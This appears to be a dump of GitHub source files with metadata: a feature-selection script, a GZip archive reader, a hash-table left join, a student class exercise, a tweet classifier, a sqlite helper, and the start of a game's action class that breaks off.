-1):\n print('On level {} of the search tree.'.format(i+1))\n feature_to_subtract = -1\n best = 0\n if i == n:\n accuracy = self.leave_one_out_CV(X, Y, current_set, None, m)\n correspond[frozenset(current_set)] = accuracy\n accuracies.append((-1, accuracy))\n else:\n for k in range(n):\n if k in current_set:\n current_copy = set()\n current_copy = current_set.copy()\n current_copy.remove(k)\n print('--Considering removing feature {}'.format(k+1))\n accuracy = self.leave_one_out_CV(X, Y, current_copy, None, m)\n\n if accuracy > best:\n best = accuracy\n feature_to_subtract = k\n current_set.remove(feature_to_subtract)\n correspond[frozenset(current_set)] = best\n accuracies.append((feature_to_subtract+1, best))\n print('Removed feature {} on level {}'.format(feature_to_subtract+1, i+1))\n\n default_rate = np.sum(Y == 1)\n if default_rate > m - default_rate:\n correspond[frozenset()] = default_rate/m\n accuracies.append((0, default_rate / m))\n else:\n correspond[frozenset()] = (m - default_rate) / m\n accuracies.append((0, (m - default_rate) / m))\n return accuracies, correspond\n\n def forward_feature_search(self):\n Y = np.copy(self.data[:, 0]) # Classifications\n X = np.delete(self.data, 0, 1) # Features\n #Y = np.array([1, 0, 1, 1, 0, 1, 0, 1, 0, 0])\n #X = np.array([[2.7, 5.5], [8, 9.1], [0.9, 4.7], [1.1, 3.2], [5.4, 8.5], [2.9, 1.9], [6.1, 6.6], [0.5, 1], [8.3, 6.6], [8.1, 4.7]])\n current_set = set()\n (m, n) = X.shape\n accuracies = []\n correspond = {}\n default_rate = np.sum(Y == 1)\n if default_rate > m - default_rate:\n correspond[frozenset()] = default_rate / m\n accuracies.append((0, default_rate/m))\n else:\n correspond[frozenset()] = (m - default_rate) / m\n accuracies.append((0, (m-default_rate)/m))\n print('When no elements exist in the set, the accuracy is: {:.1f}%\\n\\n'.format(accuracies[0][1]*100))\n print('Beginning search. . .\\n')\n for i in range(n):\n feature_to_add = -1\n best = 0\n for k in range(n):\n if k not in current_set:\n accuracy = self.leave_one_out_CV(X, Y, current_set, k, m)\n if len(current_set) == 0:\n print('\\t\\tUsing feature(s) {{{}}}: accuracy is {:.1f}%'.format(k+1, accuracy*100))\n else:\n print('\\t\\tUsing feature(s) {} and {{{}}} : accuracy is {:.1f}%'.format(current_set, k+1, accuracy*100))\n if accuracy > best:\n best = accuracy\n feature_to_add = k\n current_set.add(feature_to_add)\n correspond[frozenset(current_set)] = best\n accuracies.append((feature_to_add+1, best))\n print('\\nFeature(s) {} was best, with accuracy {:.1f}%\\n'.format({s+1 for s in current_set}, best*100))\n sorted_corr = sorted(correspond.items(), key=lambda x: x[1], reverse=True)\n best_set, best_acc = sorted_corr[0]\n print('The best feature subset is {}, which has an accuracy of {:.1f}%'.format({s+1 for s in best_set}, best_acc*100))\n return accuracies, correspond, Y, X\n\n\nif __name__ == '__main__':\n print('Welcome to Chris\\' feature selection!')\n filename = input('Enter file name:')\n print('Which algorithm would you like to run? \\n')\n print('1) Forward Search')\n print('2) Backward Search')\n print('3) Chris\\' Special Search')\n choice = input()\n data = np.genfromtxt(filename)\n (m, n) = data.shape\n removal_size = int(m/10)\n search = featureSearch(data)\n if choice == '1':\n print('Starting forward feature search. . .')\n print('\\n\\n This dataset has {} features and {} examples.'.format(n, m))\n faccuracies, fcorr, Y, X = search.forward_feature_search()\n print('Forward feature search finished.')\n elif choice == '2':\n print('Starting backward feature search. . .')\n baccuracies, bcorr = search.backward_feature_search()\n print('Backward feature search finished.')\n elif choice == '3':\n i = 1\n while len(data) > 0:\n search = featureSearch(data)\n faccuracies, fcorr, Y, X = search.forward_feature_search()\n baccuracies, bcorr = search.backward_feature_search()\n new_data = sampleTraining(data, m, removal_size)\n data = new_data.remove_some_data()\n (m, n) = data.shape","repo_name":"ChairMane/Feature-Search","sub_path":"search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":5964,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71621642027","text":"\"\"\"\nThis package provides an advanced interface for accessing multi-member GZip files (analogous to TarFile etc.)\n\nWith respect to the built-in `gzip.GZipFile` class in Python, this interface offers:\n\n- Multi-member support (i.e. multiple ``.gz`` files concatenated in one, which is allowed by the standard)\n- Full extraction of all available metadata (comments, file name, extra field, flags etc)\n\nThe main class of interest is `GZFile`. We can open a gzip file like so::\n\n gz_file = GZFile('path/to/file.gz')\n\nand obtain all the entries as `GZEntry` objects::\n\n for entry in gz_file:\n print(entry)\n\nto read or extract an entry's data, we can use::\n\n with gz_file.open(gz_file.entries[1]) as f:\n f.read()\n\nMore details are available in the `GZFile` and `GZEntry` docs.\n\"\"\"\n\nimport zlib\nimport os\n\nfrom dataclasses import dataclass\nfrom typing import ContextManager, BinaryIO, AnyStr, Union, Optional, Tuple, TypeVar, Type\nfrom os import PathLike\nfrom io import IOBase, BufferedIOBase\nfrom enum import IntFlag, IntEnum\nfrom gzip import GzipFile\n\nfrom atmfjstc.lib.binary_utils.BinaryReader import BinaryReader, BinaryReaderFormatError\nfrom atmfjstc.lib.file_utils.fileobj import FileObjSliceReader\n\n\nGZIP_MAGIC = b'\\x1f\\x8b'\n\n\nclass GZFile(ContextManager['GZFile']):\n \"\"\"\n This class provides access to a GZip archive stored in a file or file object.\n\n A `GZFile` scans the input file as soon as it is constructed. Afterwards, data about the archive is available in\n the following attributes:\n\n - `entries`: A tuple of `GZEntry` objects describing each entry in the archive, in the order they occur in the\n file. Most practical GZip archives have only one entry, but more are allowed by the standard.\n - `trailing_zeros`: The number of trailing 0 bytes found after the entries, which is apparently allowed in\n practice.\n\n The content of an entry can be opened for reading or extraction by passing it to the `open` method.\n\n A `GZFile` can be either open and closed manually::\n\n gzf = GZFile(\"file.gz\")\n print(gzf.entries)\n gzf.close()\n\n or used as a context manager::\n\n with GZFile(\"file.gz\") as gzf:\n print(gzf.entries)\n\n This class does not offer functionality for writing GZip archives.\n \"\"\"\n\n _fileobj: BinaryIO\n _fileobj_owned: bool = False\n\n _entries: Tuple['GZEntry'] = ()\n _trailing_zeros: int = 0\n\n def __init__(self, path_or_fileobj: Union[PathLike, AnyStr, BinaryIO]):\n \"\"\"\n Opens a GZip archive for reading.\n\n Args:\n path_or_fileobj: Either a filename, or an open file object containing the archive.\n\n Raises:\n NotAGZipFileError: If the data does not match the structure of a GZip file\n GZipFileCorruptError: If the file seemed to be a GZip archive, but its structure is corrupt or incorrect\n\n There are several caveats if a file object is passed:\n\n - The archive will be read from the current position in the fileobj, to the end. It is not automatically\n rewound!\n - The data in the file object should not be changed during the lifetime of the `GZFile`. It only reads the\n archive once and does not expect any changes.\n - The file object should be kept open for the lifetime of the `GZFile` if we need to read the contents of the\n entries.\n - The `GZFile` will not close the file object itself when the context ends.\n\n Finally, note that due to the limits of the GZip format, a file must be parsed in its entirety, including the\n compressed data, in order to locate all members and validate them. Opening very large archives will be expensive\n even if all you want to do is read the metadata.\n \"\"\"\n\n if isinstance(path_or_fileobj, IOBase):\n if not path_or_fileobj.seekable():\n raise ValueError(\"File object must be seekable\")\n\n self._fileobj = path_or_fileobj\n else:\n self._fileobj = open(path_or_fileobj, 'rb')\n self._fileobj_owned = True\n\n self._read_archive()\n\n @property\n def entries(self) -> Tuple['GZEntry']:\n \"\"\"\n Metadata about the entries in the archive, in the order they appear.\n \"\"\"\n return self._entries\n\n @property\n def trailing_zeros(self) -> int:\n \"\"\"\n The number of trailing zero bytes after the last entry in the archive.\n \"\"\"\n return self._trailing_zeros\n\n def open(self, entry: 'GZEntry') -> BufferedIOBase:\n \"\"\"\n Opens the content of an entry for perusal and extraction.\n\n The GZip file must still be open for this to work.\n\n Args:\n entry: A GZIP file entry, as obtained from the `entries` attribute.\n\n Returns:\n An open file object, in binary mode. If you need text access, wrap it in a `TextIOWrapper`.\n\n Warning: do not manipulate entry file objects from multiple threads simultaneously.\n \"\"\"\n\n if self._fileobj.closed:\n raise ValueError(\"Cannot read entries because the underlying file object has been closed\")\n\n if entry not in self._entries:\n raise ValueError(\"Entry does not belong to this GZip file!\")\n\n return GzipFile(\n fileobj=FileObjSliceReader(self._fileobj, entry.entry_start_offset, entry.total_entry_size),\n mode='rb',\n filename=entry.original_filename or entry.raw_original_filename,\n )\n\n def close(self):\n \"\"\"\n Closes the underlying file object.\n\n Once the file is closed, you can still read the metadata for the entries, but you won't be able to open their\n contents.\n\n Note that this method closes the file object regardless of whether it was created by `GZFile` or received from\n elsewhere!\n \"\"\"\n\n if self._fileobj is not None:\n self._fileobj.close()\n\n def __enter__(self) -> 'GZFile':\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if (not self._fileobj_owned) or (self._fileobj is None) or self._fileobj.closed:\n return\n\n self._fileobj.close()\n\n def _read_archive(self):\n reader = BinaryReader(self._fileobj, big_endian=False)\n\n if not reader.peek_magic(GZIP_MAGIC):\n raise NotAGZipFileError(reader.name())\n\n entries = []\n\n while reader.bytes_remaining() > 0:\n if reader.peek(1) == b'\\x00':\n while reader.bytes_remaining() > 0:\n data = reader.read_at_most(1000000)\n if data.count(b'\\x00') < len(data):\n raise GZipFileCorruptError(reader.name()) from \\\n BadGZipFileError(\"There is data after the entries, but it is not all zeroes\")\n\n self._trailing_zeros += len(data)\n\n break\n\n entries.append(GZEntry.read_from_binary(reader))\n\n self._entries = tuple(entries)\n\n\nclass GZEntryFlags(IntFlag):\n IS_TEXT = 1\n HAS_HEADER_CRC = 2\n HAS_EXTRA = 4\n HAS_NAME = 8\n HAS_COMMENT = 16\n\n RESERVED_MASK = 224\n\n\nclass GZCompressionMethod(IntEnum):\n DEFLATE = 8\n\n\nclass GZDeflateCompressionFlags(IntFlag):\n MAXIMUM = 2\n FAST = 4\n\n\nclass GZHostOS(IntEnum):\n FAT = 0\n AMIGA = 1\n VMS = 2\n UNIX = 3\n VM_CMS = 4\n ATARI_TOS = 5\n HPFS = 6\n MACINTOSH = 7\n Z_SYSTEM = 8\n CPM = 9\n TOPS20 = 10\n NTFS = 11\n QDOS = 12\n ACORN_RISCOS = 13\n UNKNOWN = 255\n\n\n@dataclass(frozen=True)\nclass GZEntry:\n \"\"\"\n An object containing the full metadata for an entry in a GZip archive.\n\n Note that objects of this type are just inert data containers. They can be copied from their originating `GZFile`\n object and are unaffected by its closure.\n\n Attributes:\n flags: A `GZEntryFlags` enum containing the flags set for this entry. The only one of potential use is\n `IS_TEXT`, which marks whether the content is likely a text file. The other flags just control parsing and\n are automatically used by the entry decoder.\n compression_method: A `GZCompressionMethod` enum specifying the compression method used for the entry, or\n an int, if it is not recognized. In practice, virtually all existing GZip files use DEFLATE.\n compression_flags: A compression-method dependent enum specifying flags specific to that compression method,\n or an int, if the compression method is unrecognized. In practice, this will nearly always be a\n `GZDeflateCompressionFlags` indicating whether fast vs maximum compression was used.\n compressed_length: The size of the compressed data, in bytes.\n uncompressed_length: The size of the uncompressed data, in bytes\n uncompressed_crc32: The CRC-32 hash of the uncompressed data\n entry_start_offset: The offset, in bytes, at which this entry occurs in the containing GZip file\n data_start_offset: The offset, in bytes, at which the data for this entry occurs in the containing GZip file\n host_os: [Optional] A `GZHostOS` enum specifying the operating system under which archival was performed, or\n an int if it is unrecognized.\n unix_timestamp: [Optional] A UNIX timestamp for the entry, usually representing the file last modification time.\n raw_extra_field: [Optional] A bytes object representing the content of the EXTRA field for this entry. This\n seems to have never been widely used.\n original_filename: [Optional] The original filename for this entry, as a string. It is only a suggestion, as in\n practice GZip archives are single-file and the caller can just strip the ``.gz`` extension from the archive.\n raw_original_filename: [Optional] The original filename, as a byte string, if for some reason it could not be\n interpreted as valid LATIN-1 characters.\n comment: [Optional] A comment for this entry, as a string.\n raw_comment: [Optional] The entry comment, as a byte string, if for some reason it could not be interpreted as\n valid LATIN-1 characters.\n \"\"\"\n\n flags: GZEntryFlags\n\n compression_method: Union[GZCompressionMethod, int]\n compression_flags: Union[GZDeflateCompressionFlags, int]\n compressed_length: int\n uncompressed_length: int\n uncompressed_crc32: int\n\n entry_start_offset: int\n data_start_offset: int\n\n host_os: Optional[Union[GZHostOS, int]] = None\n\n unix_timestamp: Optional[int] = None\n\n raw_extra_field: Optional[bytes] = None\n\n original_filename: Optional[str] = None\n raw_original_filename: Optional[bytes] = None\n\n comment: Optional[str] = None\n raw_comment: Optional[bytes] = None\n\n @property\n def total_entry_size(self) -> int:\n return self.data_start_offset - self.entry_start_offset + self.compressed_length + 8\n\n @staticmethod\n def read_from_binary(reader: BinaryReader) -> 'GZEntry':\n entry_start_offset = reader.tell()\n\n raw_extra_field = None\n raw_filename = None\n raw_comment = None\n\n try:\n reader.expect_magic(GZIP_MAGIC, 'GZip magic')\n compression_method, flags, timestamp, compress_flags, host_os = \\\n reader.read_struct('BBIBB', 'GZip entry header')\n\n if compression_method != GZCompressionMethod.DEFLATE:\n raise NotImplementedError(\n f\"Fount a GZ entry with compression method {compression_method}. Only Deflate entries are \"\n f\"supported (don't know how to parse past other types)\"\n )\n\n if flags & GZEntryFlags.RESERVED_MASK:\n raise NotImplementedError(\n f\"Found a GZ entry with flags: {flags:08b}. As per the spec, cannot parse the entry when reserved \"\n f\"bits are set, as they may indicate the presence of extra members we don't know how to parse.\"\n )\n\n if flags & GZEntryFlags.HAS_EXTRA:\n raw_extra_field = reader.read_length_prefixed_bytes('extra field', length_bytes=2)\n if flags & GZEntryFlags.HAS_NAME:\n raw_filename = reader.read_null_terminated_bytes('entry original name')\n if flags & GZEntryFlags.HAS_COMMENT:\n raw_comment = reader.read_null_terminated_bytes('entry comment')\n if flags & GZEntryFlags.HAS_HEADER_CRC:\n reader.skip_bytes(2) # Can't be arsed to check the header CRC, if there are errors we'll know soon\n\n data_start_offset = reader.tell()\n uncompressed_length = 0\n crc32 = zlib.crc32(b'')\n\n BUF_SIZE = 64000000\n\n decompressor = zlib.decompressobj(-zlib.MAX_WBITS)\n\n compressed_data = b''\n\n while not decompressor.eof:\n if len(compressed_data) == 0:\n compressed_data = reader.read_at_most(BUF_SIZE)\n if len(compressed_data) == 0:\n raise BadGZipFileError(\"File ends in the middle of a compressed block\")\n\n decompressed_data = decompressor.decompress(compressed_data, BUF_SIZE)\n\n uncompressed_length += len(decompressed_data)\n crc32 = zlib.crc32(decompressed_data, crc32)\n\n compressed_data = decompressor.unconsumed_tail\n\n reader.seek(-len(decompressor.unused_data), os.SEEK_CUR)\n\n declared_crc32, declared_size = reader.read_struct('II', 'GZip entry footer')\n\n crc32 &= 0xffffffff\n if crc32 != declared_crc32:\n raise BadGZipFileError(\n f\"Entry CRC failed (declared: 0x{declared_crc32:08x}, actual: 0x{crc32:08x})\"\n )\n\n if declared_size != uncompressed_length & 0xffffffff:\n raise BadGZipFileError(\n f\"Entry size does not match the declared size in the lowest 32 bits (declared: {declared_size}), \"\n f\"actual: {uncompressed_length})\"\n )\n except BadGZipFileError as e:\n raise GZipFileCorruptError(reader.name()) from e\n except BinaryReaderFormatError as e:\n raise GZipFileCorruptError(reader.name()) from e\n\n original_filename, raw_filename = _try_decode(raw_filename)\n comment, raw_comment = _try_decode(raw_comment)\n\n if compression_method == GZCompressionMethod.DEFLATE:\n compress_flags = GZDeflateCompressionFlags(compress_flags)\n\n return GZEntry(\n flags=GZEntryFlags(flags),\n compression_method=_as_enum(compression_method, GZCompressionMethod),\n compression_flags=compress_flags,\n compressed_length=reader.tell() - data_start_offset - 8,\n uncompressed_length=uncompressed_length,\n uncompressed_crc32=declared_crc32,\n entry_start_offset=entry_start_offset,\n data_start_offset=data_start_offset,\n host_os=_as_enum(host_os, GZHostOS) if host_os != 255 else None,\n unix_timestamp=timestamp if timestamp != 0 else None,\n raw_extra_field=raw_extra_field,\n original_filename=original_filename,\n raw_original_filename=raw_filename,\n comment=comment,\n raw_comment=raw_comment,\n )\n\n\ndef _try_decode(raw_str: Optional[bytes]) -> Tuple[Optional[str], Optional[bytes]]:\n if raw_str is None:\n return None, None\n\n try:\n return raw_str.decode('latin-1'), None\n except Exception:\n return None, raw_str\n\n\nT = TypeVar('T')\n\n\ndef _as_enum(raw_value: int, enum: Type[T]) -> Union[T, int]:\n try:\n return enum(raw_value)\n except Exception:\n return raw_value\n\n\nclass BadGZipFileError(Exception):\n pass\n\n\nclass NotAGZipFileError(BadGZipFileError):\n def __init__(self, file_name: Optional[str]):\n quoted_name = f\" '{file_name}'\" if file_name is not None else ''\n super().__init__(f\"File{quoted_name} is not a GZip file\")\n\n\nclass GZipFileCorruptError(BadGZipFileError):\n def __init__(self, file_name: Optional[str]):\n quoted_name = f\" '{file_name}'\" if file_name is not None else ''\n super().__init__(f\"GZip file{quoted_name} is corrupt or malformed\")\n\n","repo_name":"goc9000/python-library","sub_path":"gz-file/src/atmfjstc/lib/gz_file/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":16367,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"28439049412","text":"from functools import reduce\nfrom operator import add\n\nclass Node:\n def __init__(self, value):\n self.next=None \n self.value=value\n\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n\n def insert (self, value):\n new_node = Node(value)\n new_node.next = self.head\n self.head = new_node\n\n\nclass HashTable:\n def __init__(self,size=1024):\n self.__size=size\n self.__buckets=[None] *size\n self.keys = []\n self.repeat=[]\n \n \n def __hash(self,key):\n key=str(key)\n return reduce(add, [ord(str(char)) for char in key]) * 283 % self.__size\n\n \n def set(self,key,value):\n index = self.__hash(key)\n if self.__buckets[index] is None:\n ll = LinkedList()\n self.__buckets[index] = ll\n \n self.__buckets[index].insert([key,value])\n self.keys.append(key)\n \n\n def get(self,key):\n index=self.__hash(key)\n bucket = self.__buckets[index]\n if bucket is not None : \n curr = bucket.head\n while curr :\n if curr.value[0] == key :\n return curr.value[1]\n curr = curr.next \n return None \n \n\n def has(self, key):\n if self.get(key):\n return True\n return False \n \n def keys(self):\n return self.keys\n \ndef left_join(ht1,ht2):\n \"\"\"\n Perform a left join operation on two hash tables.\n\n Parameters:\n ht1 (HashTable): The first hash table.\n ht2 (HashTable): The second hash table.\n\n Returns:\n list: A list of lists containing the left join result.\n Each inner list contains [key, value from ht1, value from ht2 or 'Null'].\n\n \"\"\"\n keys1=ht1.keys\n keys2=ht2.keys\n baselist=[]\n for i in keys1:\n new=[i]\n new.append(ht1.get(i))\n if i in keys2:\n new.append(ht2.get(i))\n else:\n new.append('Null')\n baselist.append(new)\n return baselist\n\n","repo_name":"aseelbdoor/data-structures-and-algorithms","sub_path":"python/hashmap_left_join/hashmap_left_join.py","file_name":"hashmap_left_join.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"27022137580","text":"\n\n\"\"\"\nDette programmet henter en klasse fra et annet dokument og bruker den.\nProgrammet lager tre objekter innenfor klassen, med tre argumenter hvær.\nSå bruker programmet metoder fra klassen til å skrive ut objektene\nDeretter bruker den en annen metode for å legge til km i kilometeravstanden og\nprinter den ut.\n\"\"\"\n#oppgave 5\nfrom motorsykkel import Motorsykkel #importerer klassen fra filen\n\ndef hovedprogram(): #Lager et hovedprogram\n #Oppgave 6\n ms1 = Motorsykkel(\"BMW\", \"BT86374\", \"30000\") #oppretter et ovjekt av klassen motorsykkel\n ms2 = Motorsykkel(\"Honda\", \"PC87201\", \"45630\") #oppretter et ovjekt av klassen motorsykkel\n ms3 = Motorsykkel(\"Volvo\", \"DP36021\", \"29800\") #oppretter et ovjekt av klassen motorsykkel\n\n ms1.skrivUt() #Kaller på metoden skrivUt fra klassen\n ms2.skrivUt() #Kaller på metoden skrivUt fra klassen\n ms3.skrivUt() #Kaller på metoden skrivUt fra klassen\n\n #Oppgave 7\n ms3.kjor(10) #Kaller på kjor metoden, som legger til 10 (argumentet) i killometeravstanden\n assert ms3.hentKilometerstand() == 29810 #Skjekker at svaret blir et jeg tror det vill\n print(ms3.hentKilometerstand()) #Skriver ut den nye kilometeravstanden\n#Oppgave 8 haha\nhovedprogram() #kaller på hovedprogrammet\n","repo_name":"AdaSofieAmlie/IN1000","sub_path":"Oblig 6/testMotorsykkel.py","file_name":"testMotorsykkel.py","file_ext":"py","file_size_in_byte":1393,"program_lang":"python","lang":"no","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"30396548969","text":"import pandas as pd\r\nfrom sklearn.svm import LinearSVC\r\nfrom sklearn.feature_extraction.text import TfidfTransformer\r\nfrom sklearn.feature_extraction.text import CountVectorizer\r\nimport pickle\r\nfrom sklearn.model_selection import train_test_split\r\n\r\ndf = pd.read_csv('D:\\\\\\Data\\\\\\Work\\\\\\Stage_Cergy\\\\\\Tests_modèles\\\\Sk_learn\\\\files\\\\tweets_clean.csv') \r\n\r\ncol = ['label', 'data_clean']\r\ndf4 = df[col]\r\ndf = df[pd.notna(df['label'])]\r\ndf4.columns = ['label', 'data_clean']\r\n\r\ndef train_model():\r\n\r\n X_train,X_test, y_train,y_test = train_test_split(df4['data_clean'], df4['label'], random_state = 0)\r\n\r\n count_vect = CountVectorizer()\r\n tfidf_transformer = TfidfTransformer()\r\n\r\n X_train_counts = count_vect.fit_transform(X_train)\r\n X_train_tfidf = tfidf_transformer.fit_transform(X_train_counts)\r\n\r\n model = LinearSVC().fit(X_train_tfidf, y_train)\r\n\r\n vec_file = 'D:\\\\Data\\\\Work\\\\Stage_Cergy\\\\Tests_modèles\\\\Sk_learn\\\\files\\\\vectorizer.pickle'\r\n pickle.dump(count_vect, open(vec_file, 'wb'))\r\n\r\n # Save the model\r\n mod_file = 'D:\\\\Data\\\\Work\\\\Stage_Cergy\\\\Tests_modèles\\\\Sk_learn\\\\files\\\\classification.joblib'\r\n pickle.dump(model, open(mod_file, 'wb'))\r\n\r\ndef classify_utterance(utt):\r\n # load the vectorizer\r\n loaded_vectorizer = pickle.load(open('D:\\\\\\Data\\\\Work\\\\Stage_Cergy\\\\Tests_modèles\\\\Sk_learn\\\\files\\\\vectorizer.pickle', 'rb'))\r\n # load the model\r\n loaded_model = pickle.load(open('D:\\\\Data\\\\Work\\\\Stage_Cergy\\\\Tests_modèles\\\\Sk_learn\\\\files\\\\classification.joblib', 'rb'))\r\n # make a prediction\r\n return loaded_model.predict(loaded_vectorizer.transform([utt]))\r\n\r\n#train_model()\r\nprint(classify_utterance(\"proteger matiere planete yannickjadot\"))\r\n\r\n","repo_name":"vincent-tran-94/Stage_Cergy","sub_path":"Sk_learn/scripts/predict_thematique.py","file_name":"predict_thematique.py","file_ext":"py","file_size_in_byte":1718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"43363613200","text":"import pandas as pd\nimport sqlite3\n\n\nclass DBConnection:\n def __init__(self):\n\n self.conn = None\n try:\n self.conn = sqlite3.connect('db_okved')\n except Exception as e:\n print(e)\n\n def insert(self, row: tuple[str]):\n sql = '''\n insert into main.requests_to_okved (dt_req, okved, num_outs, first_out)\n values (?,?,?,?) \n '''\n cur = self.conn.cursor()\n cur.execute(sql, row)\n self.conn.commit()\n\n","repo_name":"tsoiadelina/related-company","sub_path":"src/db_connect.py","file_name":"db_connect.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"11183275010","text":"# coding: utf-8\n# pylint: disable=C0302\nimport random\nimport copy\nimport math\n\nfrom django.conf import settings as project_settings\n\nfrom dext.common.utils.urls import url\nfrom dext.common.utils import discovering\n\nfrom the_tale.common.utils import logic as utils_logic\n\nfrom the_tale.game.prototypes import TimePrototype\n\nfrom the_tale.game.heroes.relations import MONEY_SOURCE\n\nfrom the_tale.game.balance import constants as c, formulas as f, enums as e\n\nfrom the_tale.game.quests import logic as quests_logic\n\nfrom the_tale.game.mobs.prototypes import MobPrototype\nfrom the_tale.game.mobs.storage import mobs_storage\n\nfrom the_tale.game.artifacts.storage import artifacts_storage\n\nfrom the_tale.game.map.roads.storage import waymarks_storage\nfrom the_tale.game.map.places.storage import places_storage\nfrom the_tale.game.map.storage import map_info_storage\n\nfrom the_tale.game.abilities.relations import HELP_CHOICES\n\nfrom the_tale.game.actions import battle\nfrom the_tale.game.actions import contexts\nfrom the_tale.game.actions import exceptions\nfrom the_tale.game.actions import relations\nfrom the_tale.game.actions import meta_actions\n\n\nE = 0.0001\n\n\nclass ActionBase(object):\n\n __slots__ = ( 'hero',\n 'percents',\n 'bundle_id',\n 'description',\n 'state',\n 'removed',\n 'storage',\n 'created_at_turn',\n 'context',\n 'place_id',\n 'mob',\n 'data',\n 'break_at',\n 'length',\n 'destination_x',\n 'destination_y',\n 'percents_barier',\n 'extra_probability',\n 'mob_context',\n 'textgen_id',\n 'back',\n 'info_link',\n 'meta_action_id',\n 'replane_required')\n\n\n class STATE:\n UNINITIALIZED = 'uninitialized'\n PROCESSED = 'processed'\n\n TYPE = None\n SINGLE = True # is action work with only one hero\n TEXTGEN_TYPE = None\n CONTEXT_MANAGER = None\n HELP_CHOICES = set()\n APPROVED_FOR_STEPS_CHAIN = True\n HABIT_MODE = relations.ACTION_HABIT_MODE.PEACEFUL\n\n def __init__(self,\n hero,\n bundle_id,\n state,\n percents=0.0,\n type=None, # just for deserialization\n created_at_turn=None,\n context=None,\n description=None,\n place_id=None,\n mob=None,\n data=None,\n break_at=None,\n length=None,\n destination_x=None,\n destination_y=None,\n percents_barier=None,\n extra_probability=None,\n mob_context=None,\n textgen_id=None,\n back=False,\n info_link=None,\n meta_action_id=None,\n replane_required=False):\n\n self.updated = False\n\n self.hero = hero\n\n self.description = description\n\n self.percents = percents\n\n self.bundle_id = bundle_id\n\n self.state = state\n\n self.removed = False\n self.storage = None\n\n self.created_at_turn = created_at_turn if created_at_turn is not None else TimePrototype.get_current_turn_number()\n\n self.context = None\n self.mob_context = None\n\n if self.CONTEXT_MANAGER:\n self.context = context if context is None or isinstance(context, self.CONTEXT_MANAGER) else self.CONTEXT_MANAGER.deserialize(context)\n self.mob_context = mob_context if mob_context is None or isinstance(mob_context, self.CONTEXT_MANAGER) else self.CONTEXT_MANAGER.deserialize(mob_context)\n\n self.place_id = place_id\n\n self.mob = None\n if mob:\n self.mob = mob if isinstance(mob, MobPrototype) else MobPrototype.deserialize(mob)\n\n self.data = data\n self.break_at = break_at\n self.length = length\n self.destination_x = destination_x\n self.destination_y = destination_y\n self.percents_barier = percents_barier\n self.extra_probability = extra_probability\n self.textgen_id = textgen_id\n self.back = back\n self.meta_action_id = meta_action_id\n\n self.info_link = info_link\n\n self.replane_required = replane_required\n\n\n def serialize(self):\n data = {'type': self.TYPE.value,\n 'bundle_id': self.bundle_id,\n 'state': self.state,\n 'percents': self.percents,\n 'description': self.description,\n 'created_at_turn': self.created_at_turn}\n if self.replane_required:\n data['replane_required'] = self.replane_required\n if self.context:\n data['context'] = self.context.serialize()\n if self.place_id is not None:\n data['place_id'] = self.place_id\n if self.mob:\n data['mob'] = self.mob.serialize()\n if self.data:\n data['data'] = self.data\n if self.break_at is not None:\n data['break_at'] = self.break_at\n if self.length is not None:\n data['length'] = self.length\n if self.destination_x is not None:\n data['destination_x'] = self.destination_x\n if self.destination_y is not None:\n data['destination_y'] = self.destination_y\n if self.percents_barier is not None:\n data['percents_barier'] = self.percents_barier\n if self.extra_probability is not None:\n data['extra_probability'] = self.extra_probability\n if self.mob_context:\n data['mob_context'] = self.mob_context.serialize()\n if self.textgen_id is not None:\n data['textgen_id'] = self.textgen_id\n if self.back:\n data['back'] = self.back\n if self.meta_action_id is not None:\n data['meta_action_id'] = self.meta_action_id\n if self.info_link is not None:\n data['info_link'] = self.info_link\n\n return data\n\n @classmethod\n def deserialize(cls, hero, data):\n return cls(hero=hero, **data)\n\n @property\n def ui_type(self): return self.TYPE\n\n def ui_info(self):\n if self.description is None:\n self.description = self.get_description()\n\n if self.info_link is None:\n self.info_link = self.get_info_link()\n\n return {'percents': max(0.0, min(1.0, self.percents)),\n 'type': self.ui_type.value,\n 'description': self.description,\n 'info_link': self.info_link,\n 'is_boss': self.mob.is_boss if self.mob else None}\n\n @property\n def leader(self):\n return (not self.removed) and (self.hero.actions.current_action is self)\n\n def set_storage(self, storage):\n self.storage = storage\n\n @property\n def place(self): return places_storage[self.place_id]\n\n def get_destination(self): return self.destination_x, self.destination_y\n def set_destination(self, x, y):\n self.destination_x = x\n self.destination_y = y\n\n @property\n def meta_action(self):\n if self.storage is None: # if meta_action accessed from views (not from logic)\n return meta_actions.get_meta_action_by_id(self.meta_action_id) if self.meta_action_id is not None else None\n return self.storage.meta_actions.get(self.meta_action_id) if self.meta_action_id is not None else None\n\n @property\n def help_choices(self):\n choices = copy.copy(self.HELP_CHOICES)\n\n if HELP_CHOICES.HEAL in choices:\n if len(choices) > 1 and not self.hero.can_be_healed(strict=False):\n choices.remove(HELP_CHOICES.HEAL)\n elif not self.hero.can_be_healed(strict=True):\n choices.remove(HELP_CHOICES.HEAL)\n\n if HELP_CHOICES.HEAL_COMPANION in choices:\n if (self.hero.companion is None or\n self.hero.companion_heal_disabled() or\n self.hero.companion.health == self.hero.companion.max_health):\n choices.remove(HELP_CHOICES.HEAL_COMPANION)\n\n if HELP_CHOICES.STOCK_UP_ENERGY in choices:\n if self.hero.energy_bonus >= c.ANGEL_FREE_ENERGY_MAXIMUM:\n choices.remove(HELP_CHOICES.STOCK_UP_ENERGY)\n\n return choices\n\n def get_help_choice(self):\n\n choices = [(choice, choice.priority) for choice in self.help_choices]\n\n return utils_logic.random_value_by_priority(choices)\n\n @property\n def description_text_name(self):\n return '%s_description' % self.TEXTGEN_TYPE\n\n def get_info_link(self):\n return None\n\n def get_description(self):\n from the_tale.linguistics import logic as linguistics_logic\n return linguistics_logic.get_text(self.description_text_name, self.get_description_arguments())\n\n def 